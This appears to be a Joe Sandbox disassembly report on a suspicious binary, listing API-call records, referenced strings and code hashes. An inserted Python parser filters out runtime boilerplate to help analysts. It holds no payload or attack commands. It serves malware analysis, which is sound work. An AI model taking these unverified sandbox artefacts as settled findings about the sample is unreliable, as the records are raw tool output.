                                          • Opcode ID: b32637e56e0e59e8562ad87f82807a66048e41ce46557aecb7b67580419029e4
                                          • Instruction ID: 71eed5d8e3bde569e736d6adbb80f8299b300fdc61062cfad688a62d0be750d6
                                          • Opcode Fuzzy Hash: b32637e56e0e59e8562ad87f82807a66048e41ce46557aecb7b67580419029e4
                                          • Instruction Fuzzy Hash: DCA1277190060AAFDF05DFA8CD52EEFBBBAFF49304F10441AF916A6292D635D910DB60
                                          APIs
                                          • GetConsoleCP.KERNEL32(?,00A6AB2E,E0830C40,?,?,?,?,?,?,00A75722,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76), ref: 00A74FEF
                                          • __fassign.LIBCMT ref: 00A7506A
                                          • __fassign.LIBCMT ref: 00A75085
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00A6AB2E,00000001,?,00000005,00000000,00000000), ref: 00A750AB
                                          • WriteFile.KERNEL32(?,?,00000000,00A75722,00000000,?,?,?,?,?,?,?,?,?,00A75722,00A28F76), ref: 00A750CA
                                          • WriteFile.KERNEL32(?,00A28F76,00000001,00A75722,00000000,?,?,?,?,?,?,?,?,?,00A75722,00A28F76), ref: 00A75103
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID: w#G!
                                          • API String ID: 1324828854-519468572
                                          • Opcode ID: c21b4cdf2f35a58b17d401831b270392d738f4ee641e03f200bdef9858e84870
                                          • Instruction ID: b00d547eb7fb9c3998122d6dee7a2ec5fc76e6fbe44416e89ec4385c147656f5
                                          • Opcode Fuzzy Hash: c21b4cdf2f35a58b17d401831b270392d738f4ee641e03f200bdef9858e84870
                                          • Instruction Fuzzy Hash: D7517171E006499FDF50CFA8DC85BEEBBF8EF09301F14825AE959E7251E6709941CB60
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeGetcvtRegister
                                          • String ID: w#G!
                                          • API String ID: 2755674607-519468572
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F47FD
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F482B
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009F4882
                                          Strings
                                          • Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 009F47D4
                                          • w#G!, xrefs: 009F4774, 009F4854
                                          • Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 009F4802
                                          • w#G!, xrefs: 009F486A
                                          • w#G!, xrefs: 009F47C4
                                          Similarity
                                          • API ID: Exception@8Throw$___std_exception_copy
                                          • String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.$w#G!$w#G!$w#G!
                                          • API String ID: 4178755008-2886307431
                                          APIs
                                          • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00A5C655
                                            • Part of subcall function 00A5C53F: Replicator::operator[].LIBVCRUNTIME ref: 00A5C5AB
                                            • Part of subcall function 00A5C53F: DName::operator+=.LIBVCRUNTIME ref: 00A5C5B3
                                          • DName::operator+.LIBCMT ref: 00A5C6AC
                                          • DName::DName.LIBVCRUNTIME ref: 00A5C6F5
                                          Strings
                                          Similarity
                                          • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                          • API String ID: 834187326-2211150622
                                          APIs
                                          • UnDecorator::UScore.LIBVCRUNTIME ref: 00A5C8B8
                                          • DName::DName.LIBVCRUNTIME ref: 00A5C8C2
                                            • Part of subcall function 00A5B218: DName::doPchar.LIBVCRUNTIME ref: 00A5B23F
                                          • UnDecorator::getScopedName.LIBVCRUNTIME ref: 00A5C901
                                          • DName::operator+=.LIBVCRUNTIME ref: 00A5C90B
                                          • DName::operator+=.LIBCMT ref: 00A5C91A
                                          • DName::operator+=.LIBCMT ref: 00A5C926
                                          • DName::operator+=.LIBCMT ref: 00A5C933
                                          Strings
                                          Similarity
                                          • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                          • String ID: void
                                          • API String ID: 1480779885-3531332078
                                          APIs
                                          Similarity
                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                          • String ID:
                                          • API String ID: 1282221369-0
                                          APIs
                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A4A5AE
                                            • Part of subcall function 00A48978: __EH_prolog3_catch.LIBCMT ref: 00A4897F
                                            • Part of subcall function 00A48978: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A489B8
                                          • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00A4A5BC
                                            • Part of subcall function 00A495D5: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00A495FA
                                            • Part of subcall function 00A495D5: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00A4961D
                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A4A5D5
                                          • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A4A5E1
                                            • Part of subcall function 00A48978: InterlockedPopEntrySList.KERNEL32(?), ref: 00A48A01
                                            • Part of subcall function 00A48978: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00A48A30
                                            • Part of subcall function 00A48978: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00A48A3E
                                          • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00A4A62D
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A4A64E
                                          • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00A4A656
                                          • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A4A668
                                          • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00A4A698
                                          Similarity
                                          • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                                          • String ID:
                                          • API String ID: 2678502038-0
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F67A3
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F67E3
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F6981
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long$PK_DefaultEncryptionFilter: plaintext too long$w#G!
                                          • API String ID: 2005118841-3130109286
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009E8E09
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009E8E2B
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009E8E4B
                                          • __Getctype.LIBCPMT ref: 009E8EE1
                                          • std::_Facet_Register.LIBCPMT ref: 009E8F00
                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009E8F18
                                          Strings
                                          Similarity
                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                          • String ID: w#G!
                                          • API String ID: 1102183713-519468572
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00A59107
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00A5910F
                                          • _ValidateLocalCookies.LIBCMT ref: 00A59198
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00A591C3
                                          • _ValidateLocalCookies.LIBCMT ref: 00A59218
                                          Strings
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm$w#G!
                                          • API String ID: 1170836740-864629078
                                          APIs
                                          • __EH_prolog3.LIBCMT ref: 00A4EF8E
                                          • List.LIBCONCRT ref: 00A4F00C
                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A4F031
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4F03F
                                          • __EH_prolog3.LIBCMT ref: 00A4F04C
                                          • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00A4F070
                                          Strings
                                          Similarity
                                          • API ID: FreeH_prolog3ProcessorVirtual$Concurrency::details::Exception@8ListRootRoot::Throwstd::invalid_argument::invalid_argument
                                          • String ID: pExecutionResource
                                          • API String ID: 721108208-359481074
                                          APIs
                                          • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00A4E18B
                                            • Part of subcall function 00A4F682: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00A4F6D1
                                          • GetCurrentThread.KERNEL32 ref: 00A4E195
                                          • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00A4E1A1
                                            • Part of subcall function 00A4303F: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00A43051
                                            • Part of subcall function 00A434E6: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00A434ED
                                          • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00A4E1E4
                                            • Part of subcall function 00A4F634: SetEvent.KERNEL32(?,?,00A4E1E9,00A4EF7D,00000000,?,00000000,00A4EF7D,00000004,00A4F629,?,00000000,?,?,00000000), ref: 00A4F678
                                          • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00A4E1ED
                                            • Part of subcall function 00A4EC63: __EH_prolog3.LIBCMT ref: 00A4EC6A
                                            • Part of subcall function 00A4EC63: List.LIBCONCRT ref: 00A4EC99
                                          • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00A4E1FD
                                          Strings
                                          Similarity
                                          • API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedH_prolog3ListResourceResource::StateSubscriptionToggle
                                          • String ID: w#G!
                                          • API String ID: 2908504212-519468572
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16
                                          • String ID: a/p$am/pm$w#G!
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009F71FF
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: exceeds the maximum of $: footer length $: header length $: message length $w#G!
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          APIs
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          APIs
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          • _free.LIBCMT ref: 00A71003
                                          • _free.LIBCMT ref: 00A7101A
                                          • _free.LIBCMT ref: 00A71039
                                          • _free.LIBCMT ref: 00A71054
                                          • _free.LIBCMT ref: 00A7106B
                                          Strings
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID: w#G!
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FCA08
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FCAC8
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter$w#G!
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: EqualOffsetTypeids
                                          • String ID: w#G!$w#G!
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC804
                                            • Part of subcall function 00A57E0C: RaiseException.KERNEL32(?,?,00A2538C,?,?,Dflt,?,?,?,?,?,00A2538C,?,00AC99F0,?), ref: 00A57E6C
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009FC8B7
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw$ExceptionRaise
                                          • String ID: AAD$AuthenticatedDecryptionFilter$AuthenticatedEncryptionFilter$w#G!
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _free
                                          • String ID: w#G!
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B6690
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 009B66EE
                                          • ___std_exception_copy.LIBVCRUNTIME ref: 009B6742
                                          Strings
                                          Similarity
                                          • API ID: Exception@8Throw$___std_exception_copy
                                          • String ID: CryptoMaterial: this object contains invalid values$CryptoMaterial: this object does not support precomputation$w#G!
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,00A9ED38,00000000,00000000,8B56FF8B,00A706C7,?,00000004,00000001,00A9ED38,0000007F,?,8B56FF8B,00000001), ref: 00A7B14A
                                          • __alloca_probe_16.LIBCMT ref: 00A7B182
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A7B1D3
                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A7B1E5
                                          • __freea.LIBCMT ref: 00A7B1EE
                                            • Part of subcall function 00A75B94: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A57B27,?,?,?,?,?,009B1F07,?,?,?), ref: 00A75BC6
                                          Strings
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID: w#G!
                                          APIs
                                          • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A528F5
                                            • Part of subcall function 00A52662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A52695
                                            • Part of subcall function 00A52662: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A526B7
                                          • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A52972
                                          • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A5297E
                                          • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A5298D
                                          • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A52997
                                          • Concurrency::location::_Assign.LIBCMT ref: 00A529CB
                                          • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A529D3
                                          Similarity
                                          • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                                          • String ID:
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,?,?,21472377,00000000), ref: 009B52A8
                                          • HeapFree.KERNEL32(00000000,?,21472377,00000000), ref: 009B52AF
                                          • CloseHandle.KERNEL32(?,21472377,75916230,?,21472377,00000000,00000000,00000000), ref: 009B52D9
                                          • CloseHandle.KERNEL32(?,?,21472377,00000000,00000000,00000000), ref: 009B52DE
                                          • CloseHandle.KERNEL32(?,?,21472377,00000000,00000000,00000000), ref: 009B52E3
                                            • Part of subcall function 00A3F480: GetProcessHeap.KERNEL32(00000000,?,?,w#G!,00A8E060,000000FF,?,009B528A,21472377,75916230), ref: 00A3F4CB
                                            • Part of subcall function 00A3F480: HeapFree.KERNEL32(00000000,?,?,w#G!,00A8E060,000000FF,?,009B528A,21472377,75916230), ref: 00A3F4D2
                                          Strings
                                          Similarity
                                          • API ID: Heap$CloseHandle$FreeProcess
                                          • String ID: w#G!$w#G!
                                          • API String ID: 3876841697-1134387879
                                          • Opcode ID: d155ca300955931814c611233e6fb9739fe3351b32b5c933317c94de4af24b1b
                                          • Instruction ID: 96e9073c55167ce4f40965e591644ef1e40784be8df7a2bdaf7429036da13942
                                          • Opcode Fuzzy Hash: d155ca300955931814c611233e6fb9739fe3351b32b5c933317c94de4af24b1b
                                          • Instruction Fuzzy Hash: 3C319332A11614EFCF10DF99DD81B5ABBB8FF09720F150269EA24AB2A0D7719C05CB90
                                          APIs
                                          • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00A58F3E
                                          • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00A58F57
                                          • PMDtoOffset.LIBCMT ref: 00A58F7D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: FindInstanceTargetType$Offset
                                          • String ID: Bad dynamic_cast!
                                          • API String ID: 1467055271-2956939130
                                          • Opcode ID: deb811f627742e2fc1cbd92da37ab8f25e2c5db5f5a6e562be19778d39554d07
                                          • Instruction ID: d8d49d7b017ed787a96cdabfa7f25c1aad2d275856e1351e38786c97ccc012b7
                                          • Opcode Fuzzy Hash: deb811f627742e2fc1cbd92da37ab8f25e2c5db5f5a6e562be19778d39554d07
                                          • Instruction Fuzzy Hash: CA210872A04205AFCF14DF64DE06AAE77B5FB88722F108659ED11B7580DF38E90987A1
                                          APIs
                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427BC
                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427C2
                                          • GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427EF
                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A427F9
                                          • GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00A41F19,?,?,?,00000000), ref: 00A4280B
                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A42821
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A4282F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                          • String ID:
                                          • API String ID: 4227777306-0
                                          • Opcode ID: 2c9744f3070630f09a7cf076d70673e24136204fa71f7ce977f2cb8cf3bca3ea
                                          • Instruction ID: f200293ae7a00f81d4a4e00eec2e6914627c97d91c725028f8f9b0881426bb24
                                          • Opcode Fuzzy Hash: 2c9744f3070630f09a7cf076d70673e24136204fa71f7ce977f2cb8cf3bca3ea
                                          • Instruction Fuzzy Hash: DA018F3A704115A7CB20ABA6DD0ABFF777CEB84351BA0042AF511E20A1DF24E9058BA4
                                          APIs
                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A60EAF,?,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002), ref: 00A60F1E
                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A60F31
                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00A60EAF,?,?,00A60E4F,?,00ACC9F0,0000000C,00A60FA6,?,00000002,00000000), ref: 00A60F54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AddressFreeHandleLibraryModuleProc
                                          • String ID: CorExitProcess$mscoree.dll$w#G!
                                          • API String ID: 4061214504-3421139166
                                          • Opcode ID: d44571056d2d19d7c30fa4b5cc2e11d345bcec0f1262fcd7a9898b761d1f5ff2
                                          • Instruction ID: bd44d63253ae3f0e9c9dfb1314013aadd37c0ec2d57ba5bde45e726ff660b7c8
                                          • Opcode Fuzzy Hash: d44571056d2d19d7c30fa4b5cc2e11d345bcec0f1262fcd7a9898b761d1f5ff2
                                          • Instruction Fuzzy Hash: CAF04431600218BBCF119B94DC09FDEBFF4EB04712F044165F906A6150DF709E81DA90
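The function records above follow one fixed layout (an `APIs` list of `symbol.MODULE(args), ref: address` lines, a `Memory Dump Source` block, the `Similarity` fields with the `$`-joined `String ID`, and the opcode/instruction hashes), and most of them are statically linked MSVC runtime code (LIBCMT, LIBCPMT, LIBVCRUNTIME, LIBCONCRT facet registration and ConcRT scheduler internals) rather than the sample's own logic. The following parser is an added example, not part of the Joe Sandbox report or its IDA plugin: it turns records in this layout into structured data and separates runtime-only functions from those that call Win32 imports directly, so an analyst can skip the boilerplate. The sample text is constructed from two records shown on this page; the function names (`parse_records`, `is_runtime_only`, `win32_records`, `strings`) are this example's own.

```python
"""Parse Joe Sandbox IDA-plugin function records and flag the ones that reach
Win32 imports rather than only the statically linked MSVC runtime.

Added example; not part of the Joe Sandbox report or its tooling.
SAMPLE is constructed from two records shown in the report."""
import re
from typing import Dict, List

# Constructed sample: two records in the report's layout (one KERNEL32 caller,
# one CRT/STL facet-registration routine).
SAMPLE = """\
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A60EAF), ref: 00A60F1E
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A60F31
• FreeLibrary.KERNEL32(00000000,?,?,?,00A60EAF), ref: 00A60F54
Strings
Memory Dump Source
• Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll$w#G!
• API String ID: 4061214504-3421139166
• Opcode ID: d44571056d2d19d7c30fa4b5cc2e11d345bcec0f1262fcd7a9898b761d1f5ff2
• Instruction ID: bd44d63253ae3f0e9c9dfb1314013aadd37c0ec2d57ba5bde45e726ff660b7c8
• Opcode Fuzzy Hash: d44571056d2d19d7c30fa4b5cc2e11d345bcec0f1262fcd7a9898b761d1f5ff2
• Instruction Fuzzy Hash: CAF04431600218BBCF119B94DC09FDEBFF4EB04712F044165F906A6150DF709E81DA90
APIs
• __EH_prolog3.LIBCMT ref: 00A385FC
• std::_Lockit::_Lockit.LIBCPMT ref: 00A38606
  • Part of subcall function 009B2B00: std::_Lockit::_Lockit.LIBCPMT ref: 009B2B1D
• messages.LIBCPMT ref: 00A38640
• __CxxThrowException@8.LIBVCRUNTIME ref: 00A38695
Memory Dump Source
• Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
• String ID:
• API String ID: 438560357-0
• Opcode ID: 3367c76cf0cd4fb2abcacd3bf1ade723fcb9db94baa4b47d57cf102c846d7ea0
• Instruction ID: 047599644720bac195e8ff47219d1a68d65d7993877d3b888e8736e5145f45b4
• Opcode Fuzzy Hash: 3367c76cf0cd4fb2abcacd3bf1ade723fcb9db94baa4b47d57cf102c846d7ea0
• Instruction Fuzzy Hash: AF11A0329002289BCF05EBA4DA56AEE7775BF84720F240519F4156B291CF789E01CB91
"""

BULLET = "• "  # every field in the report is rendered as a bullet
SECTION_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# One API line: optional subcall prefix, symbol.MODULE, optional "(args)," then "ref: addr".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$"
)


def parse_records(text: str) -> List[Dict]:
    """Split the dump into records; each starts at an 'APIs' header and carries
    its API call list plus the Similarity, Source File and Snapshot File fields."""
    records: List[Dict] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "fields": {}}
            records.append(rec)
            section = "APIs"
            continue
        if rec is None:
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        body = line[len(BULLET):] if line.startswith(BULLET) else line
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                call = m.groupdict()
                call["args"] = call["args"].split(",") if call["args"] else []
                call["subcall_of"] = call.pop("caller")  # callee address for nested calls, else None
                rec["apis"].append(call)
        else:
            key, _, value = body.partition(":")
            key = key.strip()
            if section == "Similarity" or key in ("Source File", "Snapshot File"):
                rec["fields"][key] = value.strip()
    return records


def strings(rec: Dict) -> List[str]:
    """'String ID' joins the strings referenced by the function with '$'."""
    return [s for s in rec["fields"].get("String ID", "").split("$") if s]


def is_runtime_only(rec: Dict) -> bool:
    """True when every direct call targets the statically linked MSVC runtime
    (LIBCMT, LIBCPMT, LIBVCRUNTIME, LIBCONCRT): CRT/STL boilerplate, not sample logic."""
    return not any(not c["module"].startswith("LIB") for c in rec["apis"] if c["subcall_of"] is None)


def win32_records(records: List[Dict]) -> List[Dict]:
    """Records worth an analyst's time: at least one direct Win32 import call."""
    return [r for r in records if not is_runtime_only(r)]


if __name__ == "__main__":
    for rec in win32_records(parse_records(SAMPLE)):
        names = [c["name"] for c in rec["apis"] if c["subcall_of"] is None]
        print(rec["fields"]["Opcode ID"][:16], "->", ", ".join(names), strings(rec))
```

Run against the full function listing of a report, `win32_records` leaves only the functions that call into KERNEL32 and other imported modules, and the `Opcode ID` / `Instruction Fuzzy Hash` fields kept in `fields` are what you would compare across samples to find shared code.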
                                          APIs
                                          Memory Dump Source
